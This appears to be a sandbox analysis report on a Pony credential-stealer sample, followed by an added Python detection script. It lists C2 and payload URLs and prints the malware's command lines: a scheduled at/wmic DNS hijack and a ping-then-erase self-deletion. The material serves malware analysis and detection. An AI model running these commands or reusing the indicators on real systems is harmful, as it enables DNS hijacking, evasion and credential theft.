Analysis

max time kernel: 103s
max time network: 77s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 20/11/2022, 08:34

Static task: static1
Behavioral task: behavioral1
Sample: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
Resource: win7-20221111-en
General

Target: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
Size: 81KB
MD5: 1535bd3f07b9163e3f8c1105318e4fa0
SHA1: bd6a3c48c57af869ab047d677b2e12623da2b2cf
SHA256: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c
SHA512: d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5
SSDEEP: 1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy
Malware Config

Extracted: pony
C2:
  http://voladex.pw:36/fix/mark.php
  http://bolakes.pw:36/fix/refer.php
  http://camtest33.pw:36/fix/symbols.php
payload_url:
  http://camtest3.pw:36/fix/Sonar.exe

All four URLs use plain HTTP on the non-standard port 36, which is a useful network-side indicator alongside the hostnames.
Signatures

Deletes itself (1 IoC)
  pid 364, cmd.exe

Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext (1 IoC)
  PID 1724 (66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe) set thread context of PID 1476 (procid_target 27).
  Taken together with the nine WriteProcessMemory calls from 1724 into 1476 listed below, and the fact that both PIDs run the same image, this is the process-hollowing (RunPE) pattern: the first instance unpacks the payload into a second instance of itself, and the stealer activity that follows is performed by PID 1476.

Drops file in Windows directory (1 IoC)
  File created: C:\Windows\calc2.exe by 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description labels this as likely ransomware behaviour; in this sample the drive enumeration accompanies the FTP-client, browser and wallet-file harvesting listed above, and nothing in the report indicates encryption or ransom activity.

Runs ping.exe (1 TTP, 1 IoC)
  pid 924, PING.EXE

Suspicious use of AdjustPrivilegeToken (32 IoCs)
  PID 1476 (66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe) adjusted the following tokens, in this order, four times over (8 x 4 = 32):
    SeImpersonatePrivilege
    SeTcbPrivilege
    SeChangeNotifyPrivilege
    SeCreateTokenPrivilege
    SeBackupPrivilege
    SeRestorePrivilege
    SeIncreaseQuotaPrivilege
    SeAssignPrimaryTokenPrivilege
  This set (impersonation, TCB, token creation, backup/restore, primary-token assignment) is what a stealer wants in order to impersonate other logons or read protected profile files. The report records the adjustment attempts, not whether the token actually held the privileges.

Suspicious use of WriteProcessMemory (25 IoCs)
  source PID -> target PID (source process, procid_target): count
  1724 -> 1476 (66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe, 27): 9
  1476 -> 328  (66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe, 28): 4
  328  -> 1812 (cmd.exe, 30): 4
  1476 -> 364  (66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe, 31): 4
  364  -> 924  (cmd.exe, 33): 4
  The groups of four writes into each freshly created child (sample -> cmd.exe, cmd.exe -> at.exe, cmd.exe -> PING.EXE) accompany ordinary process creation here and carry no injection on their own; the 1724 -> 1476 writes, paired with the SetThreadContext call above, are the ones that indicate injection.
Processes

1. C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe  (PID 1724)
   Command line: "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe  (PID 1476, child of 1724)
      Command line: "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      Second instance of the sample, hollowed by PID 1724 (see SetThreadContext above). This is the process that performs the stealer activity and spawns both cmd.exe children.

      3. C:\Windows\SysWOW64\cmd.exe  (PID 328, child of 1476)
         Command line: "C:\Windows\System32\cmd.exe" /c at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
         - Suspicious use of WriteProcessMemory
         Schedules a job that runs every day of the week at 09:38:00 and, via WMI, points the DNS search order of every IP-enabled adapter at 37.10.116.203, with 8.8.8.8 as the secondary resolver: a persistent DNS hijack that outlives the self-deletion below. at.exe requires administrative rights and the legacy AT service of the Task Scheduler; the report does not show whether the job was actually registered.
         The command line names C:\Windows\System32\cmd.exe but the loaded image is C:\Windows\SysWOW64\cmd.exe: the sample is 32-bit (resource tag arch:x86) and its children are subject to WoW64 file-system redirection on this x64 host. The same applies to at.exe, the second cmd.exe and PING.EXE below.

         4. C:\Windows\SysWOW64\at.exe  (PID 1812, child of 328)
            Command line: at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")

      3. C:\Windows\SysWOW64\cmd.exe  (PID 364, child of 1476)
         Command line: "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
         - Deletes itself
         - Suspicious use of WriteProcessMemory
         ping -n 10 localhost serves as a sleep of roughly nine seconds so that the erase runs after the parent has exited, removing the original binary from disk. The report shows no deletion of the dropped C:\Windows\calc2.exe.

         4. C:\Windows\SysWOW64\PING.EXE  (PID 924, child of 364)
            Command line: ping -n 10 localhost
            - Runs ping.exe
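The three behaviours that stand out in this report, process hollowing, the scheduled DNS hijack and the ping-then-erase self-deletion, are each detectable from process-creation and API telemetry alone. The following is an added example, not part of the sandbox report, of detection logic run over event records constructed from the report's own process tree and signatures (the PIDs, images, command lines and the 37.10.116.203 resolver are the report's values; the record layout, the field names and the TRUSTED_DNS allow-list are assumptions of this example).

```python
"""Detections for the behaviours in the report above (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# The sample's path as shown in the report's process tree.
SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe")


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class ApiCall:
    api: str      # "WriteProcessMemory" or "SetThreadContext"
    pid: int      # calling process
    target: int   # process whose memory or thread is written


# Constructed from the report's process tree (PIDs, images and command lines are the report's).
PROCS = [
    Proc(1724, 0, SAMPLE, f'"{SAMPLE}"'),
    Proc(1476, 1724, SAMPLE, f'"{SAMPLE}"'),
    Proc(328, 1476, r"C:\Windows\SysWOW64\cmd.exe",
         '"C:\\Windows\\System32\\cmd.exe" /c at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe '
         'nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")'),
    Proc(1812, 328, r"C:\Windows\SysWOW64\at.exe",
         'at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" '
         'call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")'),
    Proc(364, 1476, r"C:\Windows\SysWOW64\cmd.exe",
         f'"C:\\Windows\\System32\\cmd.exe" /c ping -n 10 localhost && erase "{SAMPLE}"'),
    Proc(924, 364, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 10 localhost"),
]

# Constructed from the SetThreadContext / WriteProcessMemory signatures; one entry per
# distinct caller/target pair is enough for the rule (the report shows the repeats).
CALLS = [
    ApiCall("WriteProcessMemory", 1724, 1476),
    ApiCall("SetThreadContext", 1724, 1476),
    ApiCall("WriteProcessMemory", 1476, 328),
    ApiCall("WriteProcessMemory", 328, 1812),
    ApiCall("WriteProcessMemory", 1476, 364),
    ApiCall("WriteProcessMemory", 364, 924),
]

# Assumption of this example: the organisation's approved resolvers.
TRUSTED_DNS = {"8.8.8.8", "8.8.4.4"}

DNS_RE = re.compile(r"SetDNSServerSearchOrder\s*\(([^)]*)\)", re.I)
SCHEDULER_RE = re.compile(r"(^|[\s/])(at|schtasks)(\.exe)?\s", re.I)
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
SELF_DELETE_RE = re.compile(
    r'ping\s+-n\s+(\d+)\s+\S+\s*&&\s*(?:erase|del)\s+"?(.+?)"?\s*$', re.I)


def dns_hijack(p: Proc):
    """WMI call that rewrites an adapter's DNS search order to a non-approved server."""
    m = DNS_RE.search(p.cmdline)
    if not m:
        return None
    rogue = [ip for ip in IPV4_RE.findall(m.group(1)) if ip not in TRUSTED_DNS]
    if not rogue:
        return None
    return {"rule": "dns_hijack", "pid": p.pid, "rogue_dns": rogue,
            "persistent": bool(SCHEDULER_RE.search(p.cmdline))}  # at/schtasks wrapper


def self_delete(p: Proc, by_pid):
    """cmd.exe child that waits on ping and then erases its parent's own image."""
    m = SELF_DELETE_RE.search(p.cmdline)
    parent = by_pid.get(p.ppid)
    if not m or parent is None or m.group(2).lower() != parent.image.lower():
        return None
    return {"rule": "self_delete", "pid": p.pid, "parent": parent.pid,
            "ping_count": int(m.group(1))}


def process_hollowing(calls, by_pid):
    """Parent writes a child's memory and then resets its thread context (RunPE pattern)."""
    apis = defaultdict(set)
    for c in calls:
        apis[(c.pid, c.target)].add(c.api)
    hits = []
    for (src, dst), seen in apis.items():
        if {"WriteProcessMemory", "SetThreadContext"} <= seen:
            s, d = by_pid.get(src), by_pid.get(dst)
            if s and d and d.ppid == src:
                hits.append({"rule": "process_hollowing", "pid": src, "child": dst,
                             "same_image": s.image.lower() == d.image.lower()})
    return hits


def detect(procs=PROCS, calls=CALLS):
    by_pid = {p.pid: p for p in procs}
    findings = process_hollowing(calls, by_pid)
    for p in procs:
        for f in (dns_hijack(p), self_delete(p, by_pid)):
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in detect():
        print(f)
```

The self-deletion rule deliberately requires the erase target to equal the parent's image path rather than matching any `ping && del`, which keeps installers that clean up a temp file out of the results; the hollowing rule requires both API families against a direct child, since a parent writing to a child it just created is, on its own, routine.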